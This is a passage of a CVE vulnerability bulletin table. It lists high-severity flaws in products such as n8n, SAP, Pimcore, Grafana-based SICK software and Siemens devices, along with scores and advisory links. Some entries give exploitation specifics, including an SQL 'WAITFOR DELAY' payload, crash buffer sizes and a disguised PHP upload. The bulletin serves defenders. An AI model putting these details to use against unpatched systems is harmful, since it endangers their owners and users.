| N/A--Modular DS | Incorrect Privilege Assignment vulnerability in Modular DS modular-connector allows Privilege Escalation.This issue affects Modular DS: from 2.5.2 before 2.6.0. | 2026-01-16 | 10 | CVE-2026-23800 | https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-plugin-2-5-2-privilege-escalation-vulnerability?_s_id=cve |
| n8n--n8n | Using string formatting and exception handling, an attacker may bypass n8n's python-task-executor sandbox restrictions and run arbitrary unrestricted Python code in the underlying operating system. The vulnerability can be exploited via the Code block by an authenticated user with basic permissions and can lead to a full n8n instance takeover on instances operating under "Internal" execution mode. If the instance is operating under the "External" execution mode (ex. n8n's official Docker image) - arbitrary code execution occurs inside a Sidecar container and not the main node, which significantly reduces the vulnerability impact. | 2026-01-18 | 8.5 | CVE-2026-0863 | https://research.jfrog.com/vulnerabilities/n8n-python-runner-sandbox-escape-jfsa-2026-001651077/ https://github.com/n8n-io/n8n/commit/b73a4283cb14e0f27ce19692326f362c7bf3da02 |
| National Oceanic and Atmospheric Administration (NOAA)--Live Access Server (LAS) | Sites running NOAA PMEL Live Access Server (LAS) are vulnerable to remote code execution via specially crafted requests that include PyFerret expressions. By leveraging a SPAWN command, a remote, unauthenticated attacker can execute arbitrary OS commands. Fixed in a version of 'gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java' from 2025-09-24. | 2026-01-15 | 9.8 | CVE-2025-62193 | url url url url url url url |
| Noteburner--NoteBurner | NoteBurner 2.35 contains a buffer overflow vulnerability in the license code input field that allows attackers to crash the application. Attackers can generate a 6000-byte payload and paste it into the 'Name' and 'Code' fields to trigger an application crash. | 2026-01-15 | 9.8 | CVE-2021-47798 | ExploitDB-50154 Official Product Homepage VulnCheck Advisory: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) |
| Nsauditor--Backup Key Recovery | Backup Key Recovery 2.2.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the registration code input field. Attackers can paste a large buffer of 256 repeated characters into the registration key field to trigger application instability and potential crash. | 2026-01-15 | 7.5 | CVE-2021-47813 | ExploitDB-49966 Vendor Homepage VulnCheck Advisory: Backup Key Recovery 2.2.7 - Denial of Service (PoC) |
| Nsauditor--NBMonitor | NBMonitor 1.6.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the registration code input field. Attackers can paste a 256-character buffer into the registration key field to trigger an application crash and potential system instability. | 2026-01-15 | 7.5 | CVE-2021-47814 | ExploitDB-49964 Vendor Homepage VulnCheck Advisory: NBMonitor 1.6.8 - Denial of Service (PoC) |
| Nsauditor--Nsauditor | Nsauditor 3.2.3 contains a denial of service vulnerability in the registration code input field that allows attackers to crash the application. Attackers can paste a large buffer of 256 repeated characters into the 'Key' field to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47815 | ExploitDB-49965 Vendor Homepage VulnCheck Advisory: Nsauditor 3.2.3 - Denial of Service (PoC) |
| NVIDIA--NSIGHT Graphics | NVIDIA NSIGHT Graphics for Linux contains a vulnerability where an attacker could cause command injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and denial of service. | 2026-01-14 | 7.8 | CVE-2025-33206 | https://nvd.nist.gov/vuln/detail/CVE-2025-33206 https://www.cve.org/CVERecord?id=CVE-2025-33206 https://nvidia.custhelp.com/app/answers/detail/a_id/5738 |
| Odinesolutions--Odine Solutions GateKeeper | Odine Solutions GateKeeper 1.0 contains a SQL injection vulnerability in the trafficCycle API endpoint that allows remote attackers to inject malicious database queries. Attackers can exploit the vulnerability by sending crafted payloads to the /rass/api/v1/trafficCycle/ endpoint to manipulate PostgreSQL database queries and potentially extract sensitive information. | 2026-01-15 | 8.2 | CVE-2021-47782 | ExploitDB-50381 Odine Solutions GateKeeper Product Homepage VulnCheck Advisory: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection |
| OpenAgentPlatform--Dive | Dive is an open-source MCP Host Desktop Application that enables integration with function-calling LLMs. Prior to 0.13.0, crafted deeplink can install an attacker-controlled MCP server configuration without sufficient user confirmation and can lead to arbitrary local command execution on the victim's machine. This vulnerability is fixed in 0.13.0. | 2026-01-16 | 9.7 | CVE-2026-23523 | https://github.com/OpenAgentPlatform/Dive/security/advisories/GHSA-pjj5-f3wm-f9m8 https://github.com/OpenAgentPlatform/Dive/commit/a5162ac9eff366d8ea1215b8a47139a81a55a779 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. From 5.0.0 to 6.10.1, OpenC3 COSMOS contains a critical remote code execution vulnerability reachable through the JSON-RPC API. When a JSON-RPC request uses the string form of certain APIs, attacker-controlled parameter text is parsed into values using String#convert_to_value. For array-like inputs, convert_to_value executes eval(). Because the cmd code path parses the command string before calling authorize(), an unauthenticated attacker can trigger Ruby code execution even though the request ultimately fails authorization (401). This vulnerability is fixed in 6.10.2. | 2026-01-13 | 10 | CVE-2025-68271 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp |
| Phoenix Contact--TC ROUTER 3002T-3G | An unauthenticated remote attacker can trick a high privileged user into uploading a malicious payload via the config-upload endpoint, leading to code injection as root. This results in a total loss of confidentiality, availability and integrity due to improper control of code generation ('Code Injection'). | 2026-01-13 | 8.8 | CVE-2025-41717 | https://certvde.com/de/advisories/VDE-2025-073 |
| Phphtmledit--CuteEditor | CuteEditor for PHP (now referred to as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that allows attackers to write files to arbitrary web root directories. Attackers can exploit the ServerMapPath() function by renaming uploaded HTML files using directory traversal sequences to write files outside the intended template directory. | 2026-01-13 | 7.5 | CVE-2021-47751 | ExploitDB-50994 Vendor Homepage VulnCheck Advisory: CuteEditor for PHP 6.6 - Directory Traversal |
| Phpkf--phpKF CMS | phpKF CMS 3.00 Beta y6 contains an unauthenticated file upload vulnerability that allows remote attackers to execute arbitrary code by bypassing file extension checks. Attackers can upload a PHP file disguised as a PNG, rename it, and execute system commands through a crafted web shell parameter. | 2026-01-15 | 9.8 | CVE-2021-47753 | ExploitDB-50610 Official Vendor Homepage Software Download Page |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API allows an authenticated attacker to perform blind SQL injection. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to database information disclosure. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-14 | 8.8 | CVE-2026-23492 | https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj https://github.com/pimcore/pimcore/commit/25ad8674886f2b938243cbe13e33e204a2e35cc3 |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-15 | 8.6 | CVE-2026-23493 | https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h https://github.com/pimcore/pimcore/pull/18918 https://github.com/pimcore/pimcore/commit/002ec7d5f84973819236796e5b314703b58e8601 https://github.com/pimcore/pimcore/releases/tag/v11.5.14 https://github.com/pimcore/pimcore/releases/tag/v12.3.1 |
| Pjo2--Tftpd32_SE | Tftpd32 SE 4.60 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious executables that will be run with system-level permissions. | 2026-01-13 | 8.4 | CVE-2023-54338 | ExploitDB-51076 Vendor Homepage VulnCheck Advisory: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.5.7. This is due to insufficient file type validation detecting VTT files, allowing double extension files to bypass sanitization while being accepted as a valid VTT file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-16 | 8.8 | CVE-2025-12957 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad2e1d91-03bd-4e47-b679-81c42414238b?source=cve https://plugins.trac.wordpress.org/changeset/3405593/all-in-one-video-gallery |
| Primera--PTPublisher | PTPublisher 2.3.4 contains an unquoted service path vulnerability in the PTProtect service that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe' to inject malicious executables and gain system-level access. | 2026-01-13 | 8.4 | CVE-2022-50915 | ExploitDB-50885 Primera Technology Official Homepage VulnCheck Advisory: PTPublisher 2.3.4 - Unquoted Service Path |
| Private Internet Access--Private Internet Access | Private Internet Access 3.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50924 | ExploitDB-50804 Vendor Homepage Software Download Page VulnCheck Advisory: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path |
| Progress Software--Flowmon ADS | A vulnerability exists in Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 where an SQL injection vulnerability allows authenticated users to execute unintended SQL queries and commands. | 2026-01-13 | 8.8 | CVE-2025-13774 | https://community.progress.com/s/article/Flowmon-ADS-CVE-2025-13774 |
| Progress Software--LoadMaster | OS Command Injection Remote Code Execution Vulnerability in API in Progress LoadMaster allows an authenticated attacker with "User Administration" permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters | 2026-01-13 | 8.4 | CVE-2025-13444 | https://community.progress.com/s/article/LoadMaster-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/ECS-Connection-Manager-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/Connection-Manager-for-ObjectScale-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/MOVEit-WAF-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 |
| Progress Software--LoadMaster | OS Command Injection Remote Code Execution Vulnerability in API in Progress LoadMaster allows an authenticated attacker with "User Administration" permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters | 2026-01-13 | 8.4 | CVE-2025-13447 | https://community.progress.com/s/article/LoadMaster-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/ECS-Connection-Manager-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/Connection-Manager-for-ObjectScale-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/MOVEit-WAF-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 |
| Projeqtor--ProjeQtOr Project Management | ProjeQtOr Project Management 9.1.4 contains a file upload vulnerability that allows guest users to upload malicious PHP files with arbitrary code execution capabilities. Attackers can upload a PHP script through the profile attachment section and execute system commands by accessing the uploaded file with a specially crafted request parameter. | 2026-01-15 | 9.8 | CVE-2021-47819 | ExploitDB-49919 ProjeQtOr Official Website |
| ProtonVPN--ProtonVPN | ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50917 | ExploitDB-50837 ProtonVPN Official Website VulnCheck Advisory: ProtonVPN 1.26.0 - Unquoted Service Path |
| Prowise--Prowise Reflect | Prowise Reflect version 1.0.9 contains a remote keystroke injection vulnerability that allows attackers to send keyboard events through an exposed WebSocket on port 8082. Attackers can craft malicious web pages to inject keystrokes, opening applications and typing arbitrary text by sending specific WebSocket messages. | 2026-01-13 | 9.8 | CVE-2022-50925 | ExploitDB-50796 Prowise Official Homepage VulnCheck Advisory: Prowise Reflect v1.0.9 - Remote Keystroke Injection |
| pyasn1--pyasn1 | pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2. | 2026-01-16 | 7.5 | CVE-2026-23490 | https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970 https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2 |
| Pysoft--Active WebCam | Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access. | 2026-01-15 | 7.8 | CVE-2021-47790 | ExploitDB-50273 Software Download Page Vendor Homepage VulnCheck Advisory: Active WebCam 11.5 - Unquoted Service Path |
| Raimersoft--RarmaRadio | RarmaRadio 2.72.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing network configuration fields with large character buffers. Attackers can generate a 100,000 character buffer and paste it into multiple network settings fields to trigger application instability and potential crash. | 2026-01-16 | 7.5 | CVE-2021-47821 | ExploitDB-49906 Vendor Homepage VulnCheck Advisory: RarmaRadio 2.72.8 - Denial of Service |
| Red Hat--Red Hat OpenShift Dev Spaces (RHOSDS) 3.22 | A flaw was found in Eclipse Che che-machine-exec. This vulnerability allows unauthenticated remote arbitrary command execution and secret exfiltration (SSH keys, tokens, etc.) from other users' Developer Workspace containers, via an unauthenticated JSON-RPC / websocket API exposed on TCP port 3333. | 2026-01-13 | 9 | CVE-2025-12548 | RHSA-2025:22620 RHSA-2025:22623 RHSA-2025:22652 https://access.redhat.com/security/cve/CVE-2025-12548 RHBZ#2408850 |
| Redragon--Redragon Gaming Mouse | Redragon Gaming Mouse driver contains a kernel-level vulnerability that allows attackers to trigger a denial of service by sending malformed IOCTL requests. Attackers can send a crafted 2000-byte buffer with specific byte patterns to the REDRAGON_MOUSE device to crash the kernel driver. | 2026-01-15 | 7.5 | CVE-2021-47786 | ExploitDB-50322 Vendor Download Page Vulnerability Research Repository VulnCheck Advisory: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) |
| Remotemouse--Remote Mouse | Remote Mouse 4.002 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the RemoteMouseService to inject malicious executables and gain administrative access. | 2026-01-15 | 7.8 | CVE-2021-47792 | ExploitDB-50258 Official Vendor Homepage VulnCheck Advisory: Remote Mouse 4.002 - Unquoted Service Path |
| Ribccs--Build Smart ERP | Build Smart ERP 21.0817 contains an unauthenticated SQL injection vulnerability in the 'eidValue' parameter of the login validation endpoint. Attackers can inject stacked SQL queries using payloads like ';WAITFOR DELAY '0:0:3'-- to manipulate database queries and potentially extract or modify database information. | 2026-01-15 | 8.2 | CVE-2021-47777 | ExploitDB-50445 Build Smart ERP Vendor Homepage |
| risesoft-y9--Digital-Infrastructure | A flaw has been found in risesoft-y9 Digital-Infrastructure up to 9.6.7. This affects an unknown function of the file source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java of the component REST Authenticate Endpoint. Executing a manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 7.3 | CVE-2026-1050 | VDB-341603 | risesoft-y9 Digital-Infrastructure REST Authenticate Endpoint Y9PlatformUtil.java sql injection VDB-341603 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731010 | risesoft-y9 Digital-Infrastructure <=9.6.7 SQL Injection https://github.com/risesoft-y9/Digital-Infrastructure/issues/2 https://github.com/risesoft-y9/Digital-Infrastructure/issues/2#issue-3777863959 |
| RocketChat--Rocket.Chat | Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions up to 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. This endpoint returns an OAuth application, as long as the user knows its ID, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0. | 2026-01-14 | 7.7 | CVE-2026-23477 | https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Prior to 8.2.8.2, command injection vulnerability exists in the log viewing functionality that allows authenticated users to execute arbitrary system commands. The vulnerability is in app/modules/roxywi/logs.py line 87, where the grep parameter is used twice - once sanitized and once raw. This vulnerability is fixed in 8.2.8.2. | 2026-01-15 | 7.5 | CVE-2026-22265 | https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47 https://github.com/roxy-wi/roxy-wi/commit/f040d3338c4ba6f66127487361592e32e0188eee https://github.com/roxy-wi/roxy-wi/releases/tag/v8.2.8.2 |
| Sandboxie--Sandboxie Plus | Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50920 | ExploitDB-50819 Official Sandboxie-Plus Product Homepage VulnCheck Advisory: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path |
| Sandboxie-Plus--Sandboxie | Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash. | 2026-01-16 | 7.5 | CVE-2021-47831 | ExploitDB-49844 Sandboxie Official Homepage VulnCheck Advisory: Sandboxie 5.49.7 - Denial of Service |
| SAP_SE--SAP Application Server for ABAP and SAP NetWeaver RFCSDK | Due to an OS Command Injection vulnerability in SAP Application Server for ABAP and SAP NetWeaver RFCSDK, an authenticated attacker with administrative access and adjacent network access could upload specially crafted content to the server. If processed by the application, this content enables execution of arbitrary operating system commands. Successful exploitation could lead to full compromise of the system�s confidentiality, integrity, and availability. | 2026-01-13 | 8.4 | CVE-2026-0507 | https://me.sap.com/notes/3675151 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. This has high impact on confidentiality and integrity of the application ,availability is not impacted. | 2026-01-13 | 8.1 | CVE-2026-0511 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP HANA database | SAP HANA database is vulnerable to privilege escalation allowing an attacker with valid credentials of any user to switch to another user potentially gaining administrative access. This exploit could result in a total compromise of the system�s confidentiality, integrity, and availability. | 2026-01-13 | 8.8 | CVE-2026-0492 | https://me.sap.com/notes/3691059 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Landscape Transformation | SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system. | 2026-01-13 | 9.1 | CVE-2026-0491 | https://me.sap.com/notes/3697979 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Application Server ABAP and ABAP Platform | Due to a Missing Authorization Check vulnerability in Application Server ABAP and ABAP Platform, an authenticated attacker could misuse an RFC function to execute form routines (FORMs) in the ABAP system. Successful exploitation could allow the attacker to write or modify data accessible via FORMs and invoke system functionality exposed via FORMs, resulting in a high impact on integrity and availability, while confidentiality remains unaffected. | 2026-01-13 | 8.1 | CVE-2026-0506 | https://me.sap.com/notes/3688703 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4HANA (Private Cloud and On-Premise) | SAP S/4HANA (Private Cloud and On-Premise) allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system. | 2026-01-13 | 9.1 | CVE-2026-0498 | https://me.sap.com/notes/3694242 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4HANA Private Cloud and On-Premise (Financials General Ledger) | Due to insufficient input validation in SAP S/4HANA Private Cloud and On-Premise (Financials General Ledger), an authenticated user could execute crafted SQL queries to read, modify, and delete backend database data. This leads to a high impact on the confidentiality, integrity, and availability of the application. | 2026-01-13 | 9.9 | CVE-2026-0501 | https://me.sap.com/notes/3687749 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Wily Introscope Enterprise Manager (WorkStation) | Due to the usage of vulnerable third party component in SAP Wily Introscope Enterprise Manager (WorkStation), an unauthenticated attacker could create a malicious JNLP (Java Network Launch Protocol) file accessible by a public facing URL. When a victim clicks on the URL the accessed Wily Introscope Server could execute OS commands on the victim's machine. This could completely compromising confidentiality, integrity and availability of the system. | 2026-01-13 | 9.6 | CVE-2026-0500 | https://me.sap.com/notes/3668679 https://url.sap/sapsecuritypatchday |
| shopware--shopware | Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array crafted PHP Closure not checked being against allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1. | 2026-01-14 | 7.2 | CVE-2026-23498 | https://github.com/shopware/shopware/security/advisories/GHSA-7cw6-7h3h-v8pf https://github.com/shopware/shopware/commit/3966b05590e29432b8485ba47b4fcd14dd0b8475 |
| SICK AG--Incoming Goods Suite | A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: - Viewers can view all dashboards/folders regardless of permissions - Editors can view/edit/delete all dashboards/folders regardless of permissions - Editors can create dashboards in any folder regardless of permissions - Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources. | 2026-01-15 | 8.3 | CVE-2026-0713 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive. | 2026-01-15 | 8.3 | CVE-2026-22638 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | In Grafana, an excessively long dashboard title or panel name will cause Chromium browsers to become unresponsive due to Improper Input Validation vulnerability in Grafana. This issue affects Grafana: before 11.6.2 and is fixed in 11.6.2 and higher. | 2026-01-15 | 8.3 | CVE-2026-22643 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An open redirect vulnerability has been identified in Grafana OSS that can be exploited to achieve XSS attacks. The vulnerability was introduced in Grafana v11.5.0. The open redirect can be chained with path traversal vulnerabilities to achieve XSS. Fixed in versions 12.0.2+security-01, 11.6.3+security-01, 11.5.6+security-01, 11.4.6+security-01 and 11.3.8+security-01 | 2026-01-15 | 7.6 | CVE-2026-0712 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--TDC-X401GL | An attacker may gain unauthorized access to the host filesystem, potentially allowing them to read and modify system data. | 2026-01-15 | 9.9 | CVE-2026-22907 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality. | 2026-01-15 | 9.1 | CVE-2026-22908 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Certain system functions may be accessed without proper authorization, allowing attackers to start, stop, or delete installed applications, potentially disrupting system operations. | 2026-01-15 | 7.5 | CVE-2026-22909 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | The device is deployed with weak and publicly known default passwords for certain hidden user levels, increasing the risk of unauthorized access. This represents a high risk to the integrity of the system. | 2026-01-15 | 7.5 | CVE-2026-22910 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| Siemens--Industrial Edge Cloud Device (IECD) | Affected devices do not properly enforce user authentication on specific API endpoints. This could facilitate an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user. Successful exploitation requires that the attacker has learned the identity of a legitimate user. | 2026-01-13 | 10 | CVE-2025-40805 | https://cert-portal.siemens.com/productcert/html/ssa-014678.html https://cert-portal.siemens.com/productcert/html/ssa-001536.html |
| Siemens--SIMATIC ET 200AL IM 157-1 PN | A vulnerability has been identified in SIMATIC ET 200AL IM 157-1 PN (6ES7157-1AB00-0AB0) (All versions), SIMATIC ET 200MP IM 155-5 PN HF (6ES7155-5AA00-0AC0) (All versions >= V4.2.0), SIMATIC ET 200SP IM 155-6 MF HF (6ES7155-6MU00-0CN0) (All versions), SIMATIC ET 200SP IM 155-6 PN HA (incl. SIPLUS variants) (All versions < V1.3), SIMATIC ET 200SP IM 155-6 PN R1 (6ES7155-6AU00-0HM0) (All versions < V6.0.1), SIMATIC ET 200SP IM 155-6 PN/2 HF (6ES7155-6AU01-0CN0) (All versions >= V4.2.0), SIMATIC ET 200SP IM 155-6 PN/3 HF (6ES7155-6AU30-0CN0) (All versions < V4.2.2), SIMATIC PN/MF Coupler (6ES7158-3MU10-0XA0) (All versions), SIMATIC PN/PN Coupler (6ES7158-3AD10-0XA0) (All versions < V6.0.0), SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-2AC0) (All versions >= V4.2.0), SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-7AC0) (All versions >= V4.2.0), SIPLUS ET 200MP IM 155-5 PN HF T1 RAIL (6AG2155-5AA00-1AC0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-2CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-7CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF T1 RAIL (6AG2155-6AU01-1CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF TX RAIL (6AG2155-6AU01-4CN0) (All versions >= V4.2.0), SIPLUS NET PN/PN Coupler (6AG2158-3AD10-4XA0) (All versions < V6.0.0). Affected devices do not properly handle S7 protocol session disconnect requests. When receiving a valid S7 protocol Disconnect Request (COTP DR TPDU) on TCP port 102, the devices enter an improper session state. This could allow an attacker to cause the device to become unresponsive, leading to a denial-of-service condition that requires a power cycle to restore normal operation. | 2026-01-13 | 7.5 | CVE-2025-40944 | https://cert-portal.siemens.com/productcert/html/ssa-674753.html |
